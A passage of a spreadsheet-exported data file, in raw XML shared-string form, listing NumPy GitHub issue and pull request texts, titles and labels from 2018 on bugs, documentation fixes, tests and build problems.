pip install numpy_x000D_
_x000D_
### Error message:_x000D_
Collecting numpy_x000D_
  Downloading https://files.pythonhosted.org/packages/fb/7d/f8b97d97809f184d90faf320fa8e2e7eac994844c5e6c57adbed1283e9e9/numpy-1.15.1-cp36-none-win_amd64.whl_x000D_
THESE PACKAGES DO NOT MATCH THE HASHES FROM THE REQUIREMENTS FILE. If you have updated the package versions, please update the hashes. Otherwise, examine the package contents carefully; someone may have tampered with them._x000D_
    numpy from https://files.pythonhosted.org/packages/fb/7d/f8b97d97809f184d90faf320fa8e2e7eac994844c5e6c57adbed1283e9e9/numpy-1.15.1-cp36-none-win_amd64.whl#sha256=c81a6afc1d2531a9ada50b58f8c36197f8418ef3d0611d4c1d7af93fdcda764f:_x000D_
        Expected sha256 c81a6afc1d2531a9ada50b58f8c36197f8418ef3d0611d4c1d7af93fdcda764f_x000D_
             Got        3585efe41f5053dc28dd4c60fa5aaddcb7c2aeab5bf934c8f595152533c1c79e_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
Numpy version:_x000D_
1.15.1_x000D_
_x000D_
Python version:_x000D_
3.6.5 (v3.6.5:f59c0932b4, Mar 28 2018, 17:00:18) [MSC v.1900 64 bit (AMD64)]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Installation issue for version 1.15.1 on Python 3.6 (Windows 64-bit)</t>
  </si>
  <si>
    <t>Only after making this change did I realize that these docs already duplicate `numpy\doc\source\reference\arrays.scalars.rst`._x000D_
_x000D_
Brought up by #11833</t>
  </si>
  <si>
    <t>DOC: Make clear the connection between numpy types and C types</t>
  </si>
  <si>
    <t>I was experimenting with various permutations of the memory handling used by the `generic` type arrays. There's a comment in the source suggesting that we may not necessarily need to zero allocated memory before initializing the type data into it._x000D_
_x000D_
I figured this might be a bad idea since "residual" data in that memory block might cause all kinds of mysterious behaviors with things that are "supposed to be 0" actually being something else because of whatever was there before, etc._x000D_
_x000D_
However, I only see one unit test failure in the `--mode=full` test suite after making the change, `test_pickle_empty_string`, which produces a bizarre failure where `b' '` != `b' '`; perhaps related to  https://github.com/numpy/numpy/pull/5475. The test failure report is not informative at all -- it shows two identical-looking objects as being unequal, but maybe there's a subtle null-termination or related issue because of the non-zeroing._x000D_
_x000D_
I can also get the full suite to pass if I switch to `PyObject_Calloc` to auto-zero the memory block and then we can just use `(void) PyObject_InitVar((PyVarObject *)obj, type, nitems);` and not worry about fixed-width vs. variable width types because the tp_itemsize is used in a memory-related product downstream and should be 0 for fixed case. Although the full suite passes, I think the Python C API for that is 3.5 +._x000D_
_x000D_
Edit: see Python 3.6 --full test suite job for single failure; Python 2.7 is another matter</t>
  </si>
  <si>
    <t>WIP, MAINT: simplify generic type memory handling</t>
  </si>
  <si>
    <t xml:space="preserve">[ci skip]_x000D_
_x000D_
Small fixes in the polynomial package._x000D_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</si>
  <si>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DOC: Replace 'an' by 'a' in some docstrings.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '04 - Documentation', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t>I am building a C++-Numpy wrapper with [pybind11](https://github.com/pybind/pybind11)._x000D_
I would like to express as generic as in C/C++ the C `float` type in numpy._x000D_
_x000D_
But there seems to be no named type that returns the C-equivalent `float` in numpy. I can only take the explicit (but not necessarily identical) `float32`:_x000D_
  https://docs.scipy.org/doc/numpy/user/basics.types.html_x000D_
_x000D_
since `np.float` is `np.float_` is `np.float64` (or anything that is set as the *python*, yet not the *C*, float type)._x000D_
_x000D_
Any recommendation what I can do instead?_x000D_
_x000D_
[Code ref for the curious.](https://github.com/openPMD/openPMD-api/blob/c175605481442a7cbd34089c06dbfc2ea4061700/src/binding/python/BaseRecordComponent.cpp#L68-L73)_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
np.dtype("float")_x000D_
# dtype('float64')_x000D_
```</t>
  </si>
  <si>
    <t>How to Access the System C-type float</t>
  </si>
  <si>
    <t>The void type `__str__` and `__repr__` handling code at the C level was almost completely identical in their respective C functions. Both already called common `__repr__` handling code at the Python level, and this PR aims to similarly reduce code duplication / maintenance burden at the C level._x000D_
_x000D_
Note that it is, of course, not uncommon for `__str__` implementations to simply call `__repr__`, and the quaternion dtype implementation uses [exact duplicate code for both](https://github.com/moble/quaternion/blob/master/numpy_quaternion.c#L760) instead of one calling the other._x000D_
_x000D_
Here, both functions weren't quite identical, so the common handler function accepts arguments to allow the formatting differences between `__repr__` and `__str__` to be specified while abstracting the common logic._x000D_
_x000D_
void type discussion / work in PR from @ahaldane : https://github.com/numpy/numpy/pull/8981</t>
  </si>
  <si>
    <t>MAINT: reduce void type repr code duplication</t>
  </si>
  <si>
    <t>MAINT: Use textwrap.dedent in f2py tests</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- When applying the svd method on a larger matrix (90,90) or larger the np.linalg.svd fails to generate accurate results --&gt;_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
def do_the_svd(n):_x000D_
    a = np.random.randn(n, n)_x000D_
    U, s, V = np.linalg.svd(a)_x000D_
    return np.allclose(a, np.dot(U, np.dot(np.diag(s), V)))_x000D_
if __name__== "__main__":_x000D_
    for n in [9,90,900]:_x000D_
        print ("size {}, svd check {}".format(n, do_the_svd(n)))_x000D_
_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
upon execution of the above code, the first value for n (9) will return a True response, but for 90 or 900 the outcome is False._x000D_
i did not encounter this with older versions of numpy 1.14.0dev0+88f8310 _x000D_
Note that  new numpy is implemented on Ubuntu 18.04, while the older version is running under ubuntu 14.04_x000D_
using the fortran 90 equivalent (under the ubuntu 18.04 system), linking to same blas library generates good results._x000D_
&lt;!--  --&gt;_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.0.dev0+ac4d480 python 3.6 using openblas'_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Inaccurate results from numpy.linalg.svd</t>
  </si>
  <si>
    <t>['component: numpy.linalg']</t>
  </si>
  <si>
    <t xml:space="preserve">This is not a bug report but just an enhancement proposal._x000D_
_x000D_
I think it would be useful and important to be able to easily set the number of threads used by Numpy after Numpy import._x000D_
_x000D_
From the perspective of library developers, it is often useful to be able to control the number of threads used by Numpy, see for example https://github.com/biopython/biopython/pull/1401._x000D_
_x000D_
It is not difficult to do in a simple script when we are sure that Numpy or Scipy have not been imported previously with something like:_x000D_
_x000D_
```python_x000D_
import os_x000D_
os.environ["OMP_NUM_THREADS"] = "1"_x000D_
import numpy as np_x000D_
```_x000D_
_x000D_
However, in a library there is a good chance that the user has already imported Numpy in its main script, with something like_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
import fluidimage_x000D_
```_x000D_
_x000D_
In this case, I don't see how to set the number of threads used by Numpy from the fluidimage code._x000D_
_x000D_
Thus, it would be very convenient to have a function `np.set_num_threads`._x000D_
</t>
  </si>
  <si>
    <t>Set number of threads after numpy import</t>
  </si>
  <si>
    <t xml:space="preserve">Added a small test for what codecov claims is an untested code path in `array2string`, when an unexpected kwarg is fed in._x000D_
</t>
  </si>
  <si>
    <t>TST: add test for array2string unexpected kwarg</t>
  </si>
  <si>
    <t>WIP, TST: empty commit for testing appveyor</t>
  </si>
  <si>
    <t>Documentation changes from #11811</t>
  </si>
  <si>
    <t>DOC: add examples and extend existing dos for polynomial subclasses</t>
  </si>
  <si>
    <t xml:space="preserve">While working on #11811 I found that the `pow` functions for the various polynomial subclasses could be simplified and standardized by using the `reduce` function. In my testing the `reduce` approach performed marginally better than the current implementation, though the difference was small enough that it flipped occasionally. This changes_x000D_
_x000D_
```_x000D_
    elif power == 1:_x000D_
        return c_x000D_
    else:_x000D_
        # This can be made more efficient by using powers of two_x000D_
        # in the usual way._x000D_
        zs = _cseries_to_zseries(c)_x000D_
        prd = zs_x000D_
        for i in range(2, power + 1):_x000D_
            prd = np.convolve(prd, zs)_x000D_
        return _zseries_to_cseries(prd)_x000D_
```_x000D_
and _x000D_
```_x000D_
    elif power == 1:_x000D_
        return c_x000D_
    else:_x000D_
        # This can be made more efficient by using powers of two_x000D_
        # in the usual way._x000D_
        prd = c_x000D_
        for i in range(2, power + 1):_x000D_
            prd = hermmul(prd, c)_x000D_
        return prd_x000D_
```_x000D_
to _x000D_
```_x000D_
    else:_x000D_
        return reduce(chebmul, [c]*power)_x000D_
```_x000D_
_x000D_
Also, all of these functions have the note "This can be made more efficient by using powers of two in the usual way." If there are any recommendations on either trying to implement this, or removing the comment, please share._x000D_
_x000D_
@charris and @eric-wieser, if this is not a desirable change or we are not wanting to use functools, please let me know and I can close the PR. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>MAINT, ENH: simplify and standardize polynomial pow fns using reduce.</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #8912 _x000D_
_x000D_
Basically, `PySequence_Fast` ignores `__len__` in user-defined class objects so NumPy can cause the interpreter to hang if `__getitem__` returns something other than an exception._x000D_
_x000D_
This now works for the case described in the linked issue (giving users a potentially new way to define array objects from classes), but fails (segfaults) for the case in one of our unit tests where `__getitem__` raises an `Exception`:_x000D_
_x000D_
```Python_x000D_
class Map(object):_x000D_
    def __len__(self):_x000D_
       return 1_x000D_
_x000D_
    def __getitem__(self, index):_x000D_
       return KeyError() # if this were i.e., an integer we'd have a length-1 array on this branch_x000D_
```_x000D_
_x000D_
I'm able to catch the KeyError in the C code / verify it happens, but haven't been able to handle the scenario gracefully (without segfault) just yet. Open to suggestions!_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>WIP, BUG: prevent infinite __getitem__ calls on np.array()</t>
  </si>
  <si>
    <t>Fixes #11809._x000D_
_x000D_
I suppose that I should write a regression test, but don't know where and how. Does CI services have enough RAM to reproduce the issue without `MemoryError`?</t>
  </si>
  <si>
    <t>BUG: fix array_split incorrect behavior with array size bigger MAX_INT32</t>
  </si>
  <si>
    <t>The text on numpy.org was better, so mostly reused that._x000D_
Only kept the additional clarification about wheels on PyPI being_x000D_
BSD licensed, and changed "scientific computing" to "array computing"._x000D_
_x000D_
closes gh-11793</t>
  </si>
  <si>
    <t>DOC: edit setup.py docstring that is displayed on PyPI.</t>
  </si>
  <si>
    <t>- Added tests for chebypow, hermepow, hermpow, lagpow, legpow, and polypow. _x000D_
- Added missing methods to various `See Also` sections_x000D_
- Added missing methods to arithmetic in docstring._x000D_
- Added `Examples` where missing</t>
  </si>
  <si>
    <t>TST: Missing polynomial tests</t>
  </si>
  <si>
    <t>['04 - Documentation', '05 - Testing', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t>`numpy.array_split()` produces empty last chunk in case of original array size is bigger than MAX_INT32._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
**NOT OK**:_x000D_
```_x000D_
import numpy as np_x000D_
test = np.random.rand(1 &lt;&lt; 31, 1)_x000D_
for chunk in np.array_split(test, 2):_x000D_
    print(chunk.shape)_x000D_
_x000D_
&gt;&gt;&gt;(1073741824, 1)_x000D_
&gt;&gt;&gt;(0, 1)_x000D_
```_x000D_
_x000D_
**NOT OK**:_x000D_
```_x000D_
import numpy as np_x000D_
test = np.random.rand(1 &lt;&lt; 31, 1)_x000D_
for chunk in np.array_split(test, 3):_x000D_
    print(chunk.shape)_x000D_
_x000D_
&gt;&gt;&gt;(715827883, 1)_x000D_
&gt;&gt;&gt;(715827883, 1)_x000D_
&gt;&gt;&gt;(0, 1)_x000D_
```_x000D_
_x000D_
**OK**:_x000D_
```_x000D_
import numpy as np_x000D_
test = np.random.rand(1 &lt;&lt; 30, 1)_x000D_
for chunk in np.array_split(test, 2):_x000D_
    print(chunk.shape)_x000D_
_x000D_
&gt;&gt;&gt;(536870912, 1)_x000D_
&gt;&gt;&gt;(536870912, 1)_x000D_
```_x000D_
_x000D_
**OK**:_x000D_
```_x000D_
import numpy as np_x000D_
test = np.random.rand((1 &lt;&lt; 31) - 1, 1)_x000D_
for chunk in np.array_split(test, 2):_x000D_
    print(chunk.shape)_x000D_
_x000D_
&gt;&gt;&gt;(1073741824, 1)_x000D_
&gt;&gt;&gt;(1073741823, 1)_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
numpy.__version___x000D_
&gt;&gt;&gt; 1.14.4_x000D_
_x000D_
sys.version_x000D_
&gt;&gt;&gt; 3.5.2 |Continuum Analytics, Inc.| (default, Jul  5 2016, 11:41:13) [MSC v.1900 64 bit (AMD64)]_x000D_
```_x000D_
_x000D_
112 GB of RAM to exclude the problem with the memory lack.</t>
  </si>
  <si>
    <t>array_split incorrect behavior with array size bigger MAX_INT32</t>
  </si>
  <si>
    <t>I guess, that algos generating samples from distributions work the following way - initially they take samples of uniform distribution and then convert it to the needed one using some algo._x000D_
_x000D_
It would be nice to expose these algos as convertor functions getting samples from uniform distribution and returning the corresponding samples from the desired one. I certainly can use inverse cdf for that, but I guess that more efficient methods are used in the libs of this kind.</t>
  </si>
  <si>
    <t>Export convertors of distributions</t>
  </si>
  <si>
    <t>Add notes to ABCPolyBase and Polynomial documentation to explicitly state that polynomial instances are intended to be strictly immutable by default implementation.</t>
  </si>
  <si>
    <t>DOC: Polybase augmented assignment notes</t>
  </si>
  <si>
    <t>Fixes #11490._x000D_
_x000D_
This is surprisingly tricky, because `ediff1d` is subject to certain constraints in the unit tests. And indeed, we'd need to be cautious with any kind of behavior change to fix that issue._x000D_
_x000D_
Consider `test_ediff1d`:_x000D_
_x000D_
```Python_x000D_
zero_elem = np.array([]) # this defaults to float64_x000D_
assert_array_equal([0], ediff1d(zero_elem, to_begin=0))_x000D_
# np.asanyarray([0]) and np.array([0]) are int64_x000D_
```_x000D_
_x000D_
If I apply type checking preservation on `zero_elem` -&gt;  returned value there it will fail because the prepend and expected test objects are both `int64`. Maybe int-&gt;float promotion should be allowed but the reverse (which happens in the linked issue) prohibited?_x000D_
_x000D_
I thought an alternative solution might be to offload type promotion handling to `np.append()`, but that will fail unit tests because we do sometimes check for type passthrough on the input `ary` object:_x000D_
_x000D_
```Python_x000D_
assert(isinstance(np.ediff1d(np.matrix(1), to_begin=1), np.matrix))_x000D_
# np.append(np.asanyarray(1), np.matrix(1)).dtype is 'int64' for example,_x000D_
# although this gives a different result too_x000D_
# same for: np.append(np.asanyarray(1), np.ediff1d(np.matrix(1))).dtype_x000D_
# here the result is closer but an array instead of matrix_x000D_
```_x000D_
_x000D_
I wonder why `ediff1d` even has those `to_begin` and `to_end` arguments--is there actually an explicit intention to have this behave differently from i.e., `append()` as far as type handling goes? It looks like this may be cut out for matrix handling in particular maybe?_x000D_
_x000D_
The docstring for `ediff1d` isn't so clear on matters of type handling / casting / promotion as far as I can tell, and the current unit tests don't necessarily steer me toward any single clear solution so maybe I need a bit of guidance here.</t>
  </si>
  <si>
    <t>BUG: add type cast check for ediff1d</t>
  </si>
  <si>
    <t>Would it make sense for NumPy to provide `numpy.pxd` and `numpy/math.pxd` (currently [included in Cython]( https://github.com/cython/cython/tree/0.28.5/Cython/Includes/numpy ))?_x000D_
_x000D_
Given NumPy already ships SWIG bindings, providing Cython bindings seems reasonable and is not too different in concept. Plus there are already [internal consumers]( https://github.com/numpy/numpy/blob/v1.15.1/numpy/random/mtrand/numpy.pxd ) of Cython bindings, which would likely benefit from having access to a single public API. Would add that other projects like SciPy have been adding a fair number of things in `*.pxd` files included in their public API making this a bit of a trend. This would certainly help build a framework for NumPy to [expose other things in the public API]( https://github.com/numpy/numpy/issues/11764 ). Finally would note that having the Cython bindings live in Cython complicates the process of keeping them up-to-date as they must provide support for [various versions of NumPy]( https://github.com/cython/cython/blob/62ed5b2c796d9ae3c622b2e26fd162d8b9813f53/Cython/Includes/numpy/__init__.pxd#L160 ), which should *hopefully* be less of a problem if Cython bindings were included in NumPy's public API._x000D_
_x000D_
Thoughts on this would be welcome. :)</t>
  </si>
  <si>
    <t>Providing Public Cython API within NumPy</t>
  </si>
  <si>
    <t xml:space="preserve">This adds entry_points for the f2py scripts. The installed scripts_x000D_
differ between Windows and other environments._x000D_
_x000D_
* On Windows, the only script installed is 'f2py'. This works well in_x000D_
  that environment because each Python version is installed in its own_x000D_
  directory, making it easy to keep the differing script versions_x000D_
  separate._x000D_
_x000D_
* Otherwise, three scripts are installed, 'f2py', 'f2py' + 'minor', and_x000D_
  'f2py' + 'major.minor'. For instance, if Numpy is installed by_x000D_
  Python 2.7, then the installed scripts will be named 'f2py', 'f2py2',_x000D_
  and 'f2py2.7'. That naming scheme is used for back compatibility, and_x000D_
  also so that more than one Python version can be dealt with in a way_x000D_
  common to many Linux distros. Note that 'f2py' will always point to_x000D_
  the latest install and 'f2py(2|3)' to the latest Python (2|3) install_x000D_
_x000D_
The script tests have been modified to check for the new environment_x000D_
and the code previously used to install the scripts has been removed._x000D_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</si>
  <si>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ENH: Use entry_points to install the f2py scripts.</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t xml:space="preserve">As issue #7532 shows, sometimes we fail to install `f2py` into the PATH. Since it seems we cannot be completely certain we have installed it properly, we should at least document how users can call `python -mnumpy.f2py` directly, without using the executable._x000D_
</t>
  </si>
  <si>
    <t>DOC: document use when f2py is not in the PATH</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```_x000D_
_x000D_
$ brew install pypy3_x000D_
_x000D_
$ pypy3 -m venv ~/.virtualenvs/pypy3-numpy_x000D_
_x000D_
# see: https://bitbucket.org/pypy/pypy/issues/2312/pypy3-venv-module-doesnt-work_x000D_
$ cd ~/.virtualenvs/pypy3-numpy/bin_x000D_
$ rm pypy_x000D_
$ ln -s pypy3 pypy_x000D_
_x000D_
$ . ~/.virtualenvs/pypy3-numpy/bin/activate_x000D_
(pypy3-numpy) $ python --version_x000D_
Python 3.5.3 (fdd60ed87e941677e8ea11acf9f1819466521bf2, Apr 26 2018, 01:25:35)_x000D_
[PyPy 6.0.0 with GCC 4.2.1 Compatible Apple LLVM 9.1.0 (clang-902.0.39.1)]_x000D_
_x000D_
$ python setup.py build install --prefix ~/.virtualenvs/pypy3-numpy_x000D_
... significant amount of output I think isn't all that important ..._x000D_
ld: -rpath can only be used when targeting Mac OS X 10.5 or later_x000D_
clang: error: linker command failed with exit code 1 (use -v to see invocation)_x000D_
ld: -rpath can only be used when targeting Mac OS X 10.5 or later_x000D_
clang: error: linker command failed with exit code 1 (use -v to see invocation)_x000D_
error: Command "cc -pthread -shared -undefined dynamic_lookup -L/usr/local/opt/llvm/lib -Wl,-rpath,/usr/local/opt/llvm/lib build/temp.macosx-10.13-x86_64-3.5/numpy/core/src/dummymodule.o -Lbuild/temp.macosx-10.13-x86_64-3.5 -o build/lib.macosx-10.13-x86_64-3.5/numpy/core/_dummy.pypy3-60-darwin.so" failed with exit status 1_x000D_
_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
ld: -rpath can only be used when targeting Mac OS X 10.5 or later_x000D_
_x000D_
### Numpy/Python version information:_x000D_
master branch as of today (commit hash = 18f2385b2)_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Cannot compile on Mac OS 10.13.6 using Pypy3</t>
  </si>
  <si>
    <t>['00 - Bug', '24 - PyPy', 'component: build']</t>
  </si>
  <si>
    <t>DOC: Update docs after 1.15.1 release.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a unit test failing on `np.divide.accumulate` with numpy 1.15.0 compiled with the Intel compiler. The same code is fine with a local build of GCC._x000D_
_x000D_
Perhaps this is related to ENH: umath: don't make temporary copies for in-place accumulation (https://github.com/numpy/numpy/pull/10665) where @juliantaylor fixed `numpy/core/src/umath/loops.c.src` for GCC's `ivdep` pragma. That was reviewed by @eric-wieser ._x000D_
_x000D_
### Reproducing code example_x000D_
_x000D_
Source code was 1.15.0 compiled with the Intel compiler 2018.1.163.  where np.divide.accumulate fails in the numpy unit tests. _x000D_
_x000D_
I can reproduce with this Python 2.7 test case for `float64` dtype. It runs correctly for `float32` and `float128` on the Intel compiler. It also runs correctly for `float64` using GCC instead of Intel._x000D_
_x000D_
```_x000D_
$ python -c "import numpy as np; acc = np.divide.accumulate;  _x000D_
  a = np.ones(8, dtype=np.float64);  _x000D_
  print acc(a, out=2*np.ones_like(a)); print acc(a); print acc(a); print acc(a); _x000D_
  print acc(a, out=2*np.ones_like(a))"_x000D_
[1. 1. 2. 2. 2. 2. 2. 2.]_x000D_
[1. 1. 1. 1. 2. 2. 2. 2.]_x000D_
[1. 1. 1. 1. 1. 1. 2. 2.]_x000D_
[1. 1. 1. 1. 1. 1. 1. 1.]_x000D_
[1. 1. 2. 2. 2. 2. 2. 2.]_x000D_
```_x000D_
Notice how only the next two elements are set each time `np.divide.accumulate` runs. That suggests the `float64`s are being processed in pairs. Then in the final line, specifying the output array again returns to the first line's incorrect behavior._x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
numpy 1.15.0 build with ICC 2018.1.163.  _x000D_
python 2.7.11 built with GCC 4.9.3._x000D_
</t>
  </si>
  <si>
    <t>np.divide.accumulate gives incorrect results for float64 on Numpy 1.15.0 using Intel compiler</t>
  </si>
  <si>
    <t>['00 - Bug', '26 - Compiler', '29 - Intel/Anaconda']</t>
  </si>
  <si>
    <t>the top-level `setup.py`'s docstring has this:_x000D_
```_x000D_
Windows wheels are linked against the ATLAS BLAS / LAPACK library, restricted_x000D_
to SSE2 instructions, so may not give optimal linear algebra performance for_x000D_
your machine._x000D_
```_x000D_
Aren't we using OpenBLAS on all platforms?</t>
  </si>
  <si>
    <t>DOC: setup.py claims we use "ATLAS BLAS / LAPACK library"</t>
  </si>
  <si>
    <t xml:space="preserve">It seems that for complex matrices, the svd function in numpy will return non-unitary matrices._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
a=np.rand(2,2) + 1j*np.rand(2,2)_x000D_
u,s,vh = np.linalg.svd(a)_x000D_
b=vh@vh.T_x000D_
_x000D_
```_x000D_
b should be an identity matrix, but that is not the case._x000D_
</t>
  </si>
  <si>
    <t>singular value decomposition returns non-unitary matrix for complex matrix</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #11790 _x000D_
_x000D_
See the linked issue for details -- this initial attempt is probably a bit optimistic, but I'm having a hard time reproducing the problem locally on my mac._x000D_
</t>
  </si>
  <si>
    <t>WIP, TST: include missing source files in gcov report</t>
  </si>
  <si>
    <t>@pv correctly [notes](https://github.com/numpy/numpy/pull/11610#issuecomment-414165114) that a few C source files are missing from our coverage report._x000D_
_x000D_
Digging through a recent [master branch build log](https://travis-ci.org/numpy/numpy/jobs/418332536), I can see some "warning" style output for `gcov` of this nature:_x000D_
_x000D_
```_x000D_
./_configtest.gcda:stamp mismatch with notes file_x000D_
./build/temp.linux-x86_64-3.6/numpy/core/src/dummymodule.gcda:cannot open data file, assuming not executed_x000D_
./build/temp.linux-x86_64-3.6/numpy/core/src/private/mem_overlap.gcda:stamp mismatch with notes file_x000D_
./build/temp.linux-x86_64-3.6/numpy/core/src/private/npy_longdouble.gcda:stamp mismatch with notes file_x000D_
./build/temp.linux-x86_64-3.6/numpy/core/src/private/ufunc_override.gcda:stamp mismatch with notes file_x000D_
./empty/_configtest.gcda:cannot open data file, assuming not executed_x000D_
```_x000D_
_x000D_
Possible solutions to this issue [have been discussed elsewhere](https://stackoverflow.com/a/30031809/2942522) &amp; appear related to build / machine time stamps relative to tests._x000D_
_x000D_
When I test locally, this is not reproduced; my current idea is to first open a PR that tries one of the simpler solutions -- i.e., using `find` to recursively touch the generated `*.gcda` files. I'll first see if I can reproduce the issue locally by touching the `*.c` and `*.gcno` files before running `gcov` recursively so that the timestamps are messed up. It looks like one user reports that [`touch` may not suffice](https://stackoverflow.com/questions/27276155/gcov-generates-empty-coverage-for-c#comment53743033_30031809) because the timestamp is actually embedded in the `gcda` files -- I'll have to check this.</t>
  </si>
  <si>
    <t>TST: gcov missing a few files in report</t>
  </si>
  <si>
    <t>I'm running `Python 3.5.2` and `numpy 1.15.0`_x000D_
_x000D_
I'm seeing:_x000D_
```_x000D_
/usr/lib/python3.5/importlib/_bootstrap.py:222: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
  return f(*args, **kwds)_x000D_
/usr/lib/python3.5/importlib/_bootstrap.py:222: RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility. Expected 96, got 88_x000D_
  return f(*args, **kwds)_x000D_
```_x000D_
_x000D_
_x000D_
According to this [stackoverflow question](https://stackoverflow.com/questions/40845304/runtimewarning-numpy-dtype-size-changed-may-indicate-binary-incompatibility) I shouldn't see this warring as it was silence since `numpy 1.8`_x000D_
_x000D_
Why do I see it? and does it means anything?</t>
  </si>
  <si>
    <t>RuntimeWarning: numpy.dtype size changed, may indicate binary incompatibility.</t>
  </si>
  <si>
    <t>['06 - Regression', '50 - Duplicate']</t>
  </si>
  <si>
    <t xml:space="preserve">* Updates release note._x000D_
* Adds changelog._x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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Prepare for NumPy 1.15.1 release.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11740._x000D_
_x000D_
Test, fix for deprecation error causing segfault._x000D_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</si>
  <si>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Deprecation triggers segfault</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11694._x000D_
_x000D_
Fixes #11656, which is a regression after #10564._x000D_
_x000D_
Adds tests for pickling datetime64 and timedelta64 scalars. Pickling arrays of these `dtype`s works but pickling scalars fails. _x000D_
_x000D_
The problem seems to be in the new code for `gentype_getbuffer`, which creates a PEP 3118 compliant buffer. The old code was:_x000D_
```C_x000D_
int gentype_getbuffer(PyObject *self, Py_buffer *view, int flags)_x000D_
{_x000D_
    Py_ssize_t len;_x000D_
    void *buf;_x000D_
    /* FIXME: XXX: the format is not implemented! -- this needs more work */_x000D_
    len = gentype_getreadbuf(self, 0, &amp;buf);_x000D_
    return PyBuffer_FillInfo(view, self, buf, len, 1, flags);_x000D_
}_x000D_
```_x000D_
so now I need to find what is happening in that code that is not happening in the new code._x000D_
_x000D_
So far I only found where we override an original exception with a new one. ~Now `memoryview(np.datetime64('2016-01-01'))` raises an exception with the same message as `memoryview(np.array(100, 'M8[D]').~_x000D_
_x000D_
Edit: python2 - python3 confusion_x000D_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</si>
  <si>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pickle and memoryview for datetime64, timedelta64 scalars</t>
  </si>
  <si>
    <t>Some test methods had two empty lines before them instead of one, make them more PEP8 conformant.</t>
  </si>
  <si>
    <t>MAINT: reformat line spacing before test methods</t>
  </si>
  <si>
    <t>Add missing check for return value of _append_char due to `malloc` failure</t>
  </si>
  <si>
    <t>MAINT: check `_append_char` return value</t>
  </si>
  <si>
    <t xml:space="preserve">When dividing the range between first and last, the formula `(x - first) / (last - first)` is used, where `last &gt;= first`_x000D_
_x000D_
This falls apart if the types of these variables are signed integers, in which case overflow can occur._x000D_
The solution is to force the subtraction result to be unsigned._x000D_
_x000D_
This is a regression in 1.15.0 (where the test fails)_x000D_
_x000D_
trivially-backportable again_x000D_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</si>
  <si>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Avoid signed overflow in histogram</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11735._x000D_
_x000D_
The TestMaskedArrayMethods.test_sort_flexible test was failing for for_x000D_
the subarray checks on big endian systems. That was probably due to_x000D_
subarrays being sorted as bytestrings. This fixes the test by simply_x000D_
checking that the sort does not error rather than checking the result._x000D_
_x000D_
Closes #11716._x000D_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</si>
  <si>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test sensitive to platform byte order.</t>
  </si>
  <si>
    <t xml:space="preserve">The function was failing for non-ndarray objects that defined_x000D_
that defined __array__, in particular `xarray.DataArray`. Fix_x000D_
by calling asanyarray on the inputs, which was done implicitly_x000D_
before._x000D_
_x000D_
Closes #11772._x000D_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</si>
  <si>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regression in intersect1d.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #11715._x000D_
_x000D_
For whatever reason, this stubbing does not do anything. I think it is because the_x000D_
class setup overrides the module setup, but I did not look into it too deeply.  Renaming_x000D_
 `setup` to `setup_module` and `teardown` to `teardown_module` fixes that._x000D_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</si>
  <si>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TST: Fix urlopen stubbing.</t>
  </si>
  <si>
    <t>['00 - Bug', '05 - Testing', '08 - Backport', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Use np.any instead of method to be a bit more robust against bad_x000D_
subclassing of ndarray._x000D_
_x000D_
Closes #11743._x000D_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</si>
  <si>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Make assert_array_compare more generic.</t>
  </si>
  <si>
    <t xml:space="preserve">making corrections to documentation grammar while reading through `polynomial/_polybase.py`._x000D_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</si>
  <si>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Numerous grammar fixups in documentation</t>
  </si>
  <si>
    <t xml:space="preserve">See https://github.com/pydata/xarray/issues/2371_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```_x000D_
1.15.0 3.6.6 |Anaconda, Inc.| (default, Jun 28 2018, 17:14:51) _x000D_
[GCC 7.2.0]_x000D_
```_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Use of `ravel` in `intersect1d` breaks compatibility with xarray</t>
  </si>
  <si>
    <t>Closes #11442.</t>
  </si>
  <si>
    <t>BUG: Make `random.shuffle` work on 1-D instances of `ndarray` subclasses</t>
  </si>
  <si>
    <t>When a structure has a sub-array field, its dtype is reported differently in the following cases:_x000D_
```_x000D_
